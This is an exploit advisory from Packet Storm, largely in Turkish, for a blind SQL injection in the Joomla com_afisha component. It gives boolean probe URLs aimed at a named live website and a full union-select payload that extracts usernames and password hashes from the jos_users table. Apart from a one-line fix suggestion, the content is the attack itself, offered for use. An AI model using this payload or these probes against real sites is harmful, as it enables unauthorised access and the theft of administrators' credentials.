The Joomla Afisha component suffers from a remote blind SQL injection vulnerability.
759cbe359f764fc801a99e81768693914180ef7b8da9894773a3da5b24698545
<------------------- header data start ------------------- >
#####################################################################
#Joomla Component com_afisha Blind SQL injection Vulnerability
#####################################################################
# author : FL0RiX
# Name : com_afisha
# Bug Type : (Blind) SQL Injection
# Infection : Admin login bilgileri alýnabilir.
# Demo Vuln. :
TRUE(+)
» http://www.krasrab.net/index.php?option=com_afisha&task=viewcat&Itemidcat=4 and 1=1
FALSE(-)
» http://www.krasrab.net/index.php?option=com_afisha&task=viewcat&Itemidcat=4 and 1=0
# Bug Fix Advice : Zararlý karakterler filtrelenmelidir.
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
path/index.php?option=com_afisha&task=viewcat&Itemidcat=4/**/and/**/1=0/**/union/**/select/**/concat(username,0x3a,password)fl0rix,user()/**/from/**/jos_users
< -- bug code end of -- >
_________________________________________________________________
Yeni Windows 7: Size en uygun bilgisayarý bulun. Daha fazla bilgi edinin.
http://windows.microsoft.com/shop
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed